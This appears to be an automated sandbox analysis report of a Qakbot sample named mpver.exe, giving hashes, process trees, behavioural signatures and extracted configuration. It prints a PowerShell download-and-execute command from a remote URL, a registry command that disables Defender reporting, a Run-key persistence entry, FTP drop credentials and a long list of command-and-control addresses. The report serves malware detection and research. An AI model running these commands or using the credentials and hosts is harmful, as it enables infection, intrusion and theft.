Analysis
-
max time kernel
149s -
max time network
68s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
19-07-2021 20:56
Static task
static1
Behavioral task
behavioral1
Sample
mpver.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
mpver.exe
Resource
win10v20210410
General
-
Target
mpver.exe
-
Size
36.5MB
-
MD5
07a25e7f4f3a756e64c07c07d82591a4
-
SHA1
ff3f1f7e82d1721fa0d28cad127bca6d799f40b8
-
SHA256
6f5d3879c4a516661a93499e64d7595333fb51d6a87677de25d9b7a19b41b362
-
SHA512
efd1acbc61603c810b5048d5f71cfaddba3430ecf49e6a815f76b7ffa9fc48a91e1d371986199569bc15cd8051d0a67c24e8d6c6c3303ffcac0448395233b5d4
Malware Config
Extracted
https://www.allens-treasure-house.com/books_files/001.ps1
Extracted
qakbot
322.109
1515090054
Protocol: ftp- Host:
66.96.133.9 - Port:
21 - Username:
help - Password:
eT5TerAcnFe6~
Protocol: ftp- Host:
174.123.38.58 - Port:
21 - Username:
log@thebrainregistry.com - Password:
4BQ1MeeRAwNZEVu
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
logger@ostergift.com - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
logger@grupocrepusculo.net - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
logger@trussedup.com - Password:
RoP4Af0RKAAQ74V
151.202.46.113:443
108.58.129.90:995
96.85.138.153:443
108.35.21.79:443
68.83.130.163:443
75.83.30.135:443
216.201.159.118:443
76.98.128.87:443
65.73.215.139:990
50.195.161.2:995
216.187.170.2:443
74.93.207.181:993
75.97.144.106:995
73.186.100.187:443
86.27.41.234:443
96.70.92.177:465
68.173.55.51:443
165.225.38.208:443
71.190.202.120:443
117.195.250.175:443
108.49.159.2:993
47.37.99.212:995
50.44.183.216:443
108.49.159.2:990
173.72.96.50:443
65.218.249.250:443
174.70.133.56:995
70.118.18.242:443
173.72.96.50:995
96.85.138.153:6881
66.189.228.49:995
67.247.220.195:443
96.91.53.117:443
76.179.72.219:443
47.223.78.244:993
136.61.161.102:443
206.169.107.58:995
96.70.92.177:993
209.212.131.66:443
73.198.142.130:995
76.188.197.130:443
50.42.189.206:993
24.119.224.202:2222
189.155.215.219:995
108.49.159.2:995
189.155.215.219:993
173.247.186.90:2222
23.240.50.137:443
47.22.21.180:995
107.184.242.19:443
96.85.138.153:995
216.51.79.71:443
66.76.136.65:1194
100.35.65.82:995
98.102.37.174:2222
151.181.38.50:6881
70.95.129.59:443
62.113.27.30:443
38.101.195.44:443
66.222.48.40:443
73.250.49.41:443
88.238.150.110:995
85.100.134.140:995
98.191.134.121:443
104.159.220.171:443
41.40.59.182:443
97.89.112.190:443
50.198.141.161:2222
105.186.189.149:443
63.154.103.30:995
27.3.93.3:443
118.174.161.47:995
75.189.247.81:443
73.211.20.57:443
72.20.132.2:443
71.85.72.9:443
75.110.246.15:443
216.251.203.253:443
73.77.96.186:443
73.255.36.173:443
98.220.248.132:443
69.118.17.150:995
67.165.82.207:443
24.187.255.116:443
76.64.116.148:2222
70.88.214.41:443
41.142.143.68:443
76.189.128.63:443
98.196.247.150:443
24.243.42.72:443
24.45.230.32:443
12.166.108.82:995
174.81.187.84:443
98.26.2.182:443
24.14.39.10:443
173.185.75.235:995
151.202.46.113:995
174.231.135.91:443
65.33.119.17:443
172.87.188.2:443
52.119.82.82:2222
174.44.157.249:2222
96.29.42.70:443
172.75.241.225:995
50.206.74.2:443
40.138.12.210:443
66.76.136.65:443
71.28.5.188:443
64.40.70.150:443
73.183.141.219:443
24.255.118.75:443
216.228.55.13:443
216.15.14.104:443
198.57.88.73:443
73.163.155.82:443
71.12.171.133:995
73.211.72.58:443
65.92.11.213:2222
174.194.13.181:443
208.102.147.26:443
73.171.208.223:443
184.155.19.94:2222
73.210.183.3:443
173.49.95.92:443
47.223.166.146:443
24.163.66.146:443
70.57.122.178:443
70.189.67.15:443
88.224.109.128:443
12.45.162.90:2078
176.232.73.217:443
76.95.241.114:443
73.8.165.2:443
24.224.117.142:2222
98.121.199.219:443
205.201.144.27:443
71.245.117.42:32102
70.100.0.90:443
156.199.175.72:443
165.138.13.253:995
206.246.140.25:6882
75.150.236.59:443
50.76.117.233:2083
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 824 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
lugkhnfh.exelugkhnfh.exepid process 672 lugkhnfh.exe 800 lugkhnfh.exe -
Loads dropped DLL 2 IoCs
Processes:
mpver.exepid process 1104 mpver.exe 1104 mpver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\yukyqo = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Lugkhnfhu\\lugkhnfh.exe\"" explorer.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
mpver.exempver.exelugkhnfh.exepowershell.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXElugkhnfh.exepid process 1104 mpver.exe 1412 mpver.exe 1412 mpver.exe 672 lugkhnfh.exe 824 powershell.exe 824 powershell.exe 1996 explorer.exe 1996 explorer.exe 1136 taskhost.exe 1252 Dwm.exe 1288 Explorer.EXE 800 lugkhnfh.exe 800 lugkhnfh.exe 1996 explorer.exe 1996 explorer.exe 800 lugkhnfh.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe 1996 explorer.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
lugkhnfh.exepid process 672 lugkhnfh.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 824 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
mpver.exelugkhnfh.execmd.exeexplorer.exedescription pid process target process PID 1104 wrote to memory of 1412 1104 mpver.exe mpver.exe PID 1104 wrote to memory of 1412 1104 mpver.exe mpver.exe PID 1104 wrote to memory of 1412 1104 mpver.exe mpver.exe PID 1104 wrote to memory of 1412 1104 mpver.exe mpver.exe PID 1104 wrote to memory of 672 1104 mpver.exe lugkhnfh.exe PID 1104 wrote to memory of 672 1104 mpver.exe lugkhnfh.exe PID 1104 wrote to memory of 672 1104 mpver.exe lugkhnfh.exe PID 1104 wrote to memory of 672 1104 mpver.exe lugkhnfh.exe PID 1104 wrote to memory of 1216 1104 mpver.exe reg.exe PID 1104 wrote to memory of 1216 1104 mpver.exe reg.exe PID 1104 wrote to memory of 1216 1104 mpver.exe reg.exe PID 1104 wrote to memory of 1216 1104 mpver.exe reg.exe PID 1104 wrote to memory of 824 1104 mpver.exe powershell.exe PID 1104 wrote to memory of 824 1104 mpver.exe powershell.exe PID 1104 wrote to memory of 824 1104 mpver.exe powershell.exe PID 1104 wrote to memory of 824 1104 mpver.exe powershell.exe PID 672 wrote to memory of 800 672 lugkhnfh.exe lugkhnfh.exe PID 672 wrote to memory of 800 672 lugkhnfh.exe lugkhnfh.exe PID 672 wrote to memory of 800 672 lugkhnfh.exe lugkhnfh.exe PID 672 wrote to memory of 800 672 lugkhnfh.exe lugkhnfh.exe PID 1104 wrote to memory of 300 1104 mpver.exe cmd.exe PID 1104 wrote to memory of 300 1104 mpver.exe cmd.exe PID 1104 wrote to memory of 300 1104 mpver.exe cmd.exe PID 1104 wrote to memory of 300 1104 mpver.exe cmd.exe PID 300 wrote to memory of 1668 300 cmd.exe PING.EXE PID 300 wrote to memory of 1668 300 cmd.exe PING.EXE PID 300 wrote to memory of 1668 300 cmd.exe PING.EXE PID 300 wrote to memory of 1668 300 cmd.exe PING.EXE PID 672 wrote to memory of 1996 672 lugkhnfh.exe explorer.exe PID 672 wrote to memory of 1996 672 lugkhnfh.exe explorer.exe PID 672 wrote to memory of 1996 672 lugkhnfh.exe explorer.exe PID 672 wrote to memory of 1996 672 lugkhnfh.exe explorer.exe PID 672 wrote to memory of 1996 672 lugkhnfh.exe explorer.exe PID 1996 wrote to memory of 1136 1996 explorer.exe taskhost.exe PID 1996 wrote to memory of 1136 1996 explorer.exe taskhost.exe PID 1996 wrote to memory of 1136 1996 explorer.exe taskhost.exe PID 1996 wrote to memory of 1252 1996 explorer.exe Dwm.exe PID 1996 wrote to memory of 1252 1996 explorer.exe Dwm.exe PID 1996 wrote to memory of 1252 1996 explorer.exe Dwm.exe PID 1996 wrote to memory of 1288 1996 explorer.exe Explorer.EXE PID 1996 wrote to memory of 1288 1996 explorer.exe Explorer.EXE PID 1996 wrote to memory of 1288 1996 explorer.exe Explorer.EXE PID 1996 wrote to memory of 800 1996 explorer.exe lugkhnfh.exe PID 1996 wrote to memory of 800 1996 explorer.exe lugkhnfh.exe PID 1996 wrote to memory of 800 1996 explorer.exe lugkhnfh.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\mpver.exe"C:\Users\Admin\AppData\Local\Temp\mpver.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mpver.exe"C:\Users\Admin\AppData\Local\Temp\mpver.exe" /C3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exeC:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exe" /C4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\bcaeumwwpzstdylzpruzcfrhcmn.txt'"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\mpver.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnf.datMD5
851b02b84f19d9f9683baa679ecef828
SHA1ef34d84d3eaaf6b7242e289ee07ead61ebade13a
SHA2567c9c42e3e749ac65fcaf3aa22e138e073132100bf04d33b8ba47d16074b21991
SHA512619574042a2cf1082a3e0c81c578a5333bdc73f6e7640431d081d159e9b2fdb254ed58b01e31dfdbf33e6a38f290db9f2fb38c3bf69a4d9d6e85a5fac5f66c95
-
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exeMD5
d5f5d00602dbac0381179962cfd5c500
SHA15d33d69e7d211aacf626bfad2def400ddaa66a5c
SHA2565dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e
SHA512ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985
-
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exeMD5
d5f5d00602dbac0381179962cfd5c500
SHA15d33d69e7d211aacf626bfad2def400ddaa66a5c
SHA2565dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e
SHA512ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985
-
C:\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exeMD5
d5f5d00602dbac0381179962cfd5c500
SHA15d33d69e7d211aacf626bfad2def400ddaa66a5c
SHA2565dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e
SHA512ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985
-
\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exeMD5
d5f5d00602dbac0381179962cfd5c500
SHA15d33d69e7d211aacf626bfad2def400ddaa66a5c
SHA2565dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e
SHA512ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985
-
\Users\Admin\AppData\Roaming\Microsoft\Lugkhnfhu\lugkhnfh.exeMD5
d5f5d00602dbac0381179962cfd5c500
SHA15d33d69e7d211aacf626bfad2def400ddaa66a5c
SHA2565dc5541b9f8e8789e6915ed7370263dd1e08377d559ae95aa585431a20b07f3e
SHA512ce3460f3f0889de331330e3cbde2e2a6a27c5e48bcb75f02bd0092e53c82f67aa48b851a5639beb9ad67b1b68e9e737694e8cfd8a65e82e3c3b9a6ccca618985
-
memory/300-105-0x0000000000000000-mapping.dmp
-
memory/672-69-0x0000000000000000-mapping.dmp
-
memory/800-127-0x0000000000340000-0x0000000000341000-memory.dmpFilesize
4KB
-
memory/800-128-0x00000000005E0000-0x0000000000606000-memory.dmpFilesize
152KB
-
memory/800-125-0x0000000001000000-0x0000000001084000-memory.dmpFilesize
528KB
-
memory/800-129-0x0000000000020000-0x0000000000021000-memory.dmpFilesize
4KB
-
memory/800-77-0x0000000000000000-mapping.dmp
-
memory/824-104-0x0000000002750000-0x0000000002751000-memory.dmpFilesize
4KB
-
memory/824-91-0x00000000026F0000-0x00000000026F1000-memory.dmpFilesize
4KB
-
memory/824-82-0x000000001AD20000-0x000000001AD21000-memory.dmpFilesize
4KB
-
memory/824-83-0x000000001ACA0000-0x000000001ACA2000-memory.dmpFilesize
8KB
-
memory/824-84-0x000000001ACA4000-0x000000001ACA6000-memory.dmpFilesize
8KB
-
memory/824-85-0x00000000025E0000-0x00000000025E1000-memory.dmpFilesize
4KB
-
memory/824-86-0x0000000002430000-0x0000000002431000-memory.dmpFilesize
4KB
-
memory/824-87-0x000000001ABB0000-0x000000001ABB1000-memory.dmpFilesize
4KB
-
memory/824-88-0x0000000002640000-0x0000000002641000-memory.dmpFilesize
4KB
-
memory/824-81-0x0000000002350000-0x0000000002351000-memory.dmpFilesize
4KB
-
memory/824-103-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/824-75-0x0000000000000000-mapping.dmp
-
memory/824-78-0x000007FEFC181000-0x000007FEFC183000-memory.dmpFilesize
8KB
-
memory/1104-60-0x0000000001000000-0x0000000001084000-memory.dmpFilesize
528KB
-
memory/1104-62-0x00000000002A0000-0x00000000002A6000-memory.dmpFilesize
24KB
-
memory/1104-59-0x0000000075EF1000-0x0000000075EF3000-memory.dmpFilesize
8KB
-
memory/1136-122-0x00000000776D0000-0x00000000776D1000-memory.dmpFilesize
4KB
-
memory/1136-115-0x0000000000160000-0x0000000000161000-memory.dmpFilesize
4KB
-
memory/1136-116-0x0000000001D00000-0x0000000001D2C000-memory.dmpFilesize
176KB
-
memory/1216-70-0x0000000000000000-mapping.dmp
-
memory/1252-124-0x00000000776D0000-0x00000000776D1000-memory.dmpFilesize
4KB
-
memory/1252-123-0x00000000001A0000-0x00000000001CC000-memory.dmpFilesize
176KB
-
memory/1288-121-0x00000000776D0000-0x00000000776D1000-memory.dmpFilesize
4KB
-
memory/1288-118-0x0000000002960000-0x000000000298C000-memory.dmpFilesize
176KB
-
memory/1412-63-0x0000000000000000-mapping.dmp
-
memory/1668-106-0x0000000000000000-mapping.dmp
-
memory/1996-111-0x00000000000D0000-0x0000000000139000-memory.dmpFilesize
420KB
-
memory/1996-119-0x00000000004A0000-0x00000000004A1000-memory.dmpFilesize
4KB
-
memory/1996-120-0x00000000003C0000-0x0000000000440000-memory.dmpFilesize
512KB
-
memory/1996-117-0x0000000000490000-0x0000000000491000-memory.dmpFilesize
4KB
-
memory/1996-114-0x00000000003C0000-0x0000000000440000-memory.dmpFilesize
512KB
-
memory/1996-113-0x00000000003C0000-0x0000000000440000-memory.dmpFilesize
512KB
-
memory/1996-112-0x0000000000330000-0x0000000000331000-memory.dmpFilesize
4KB
-
memory/1996-109-0x0000000074F41000-0x0000000074F43000-memory.dmpFilesize
8KB
-
memory/1996-107-0x0000000000000000-mapping.dmp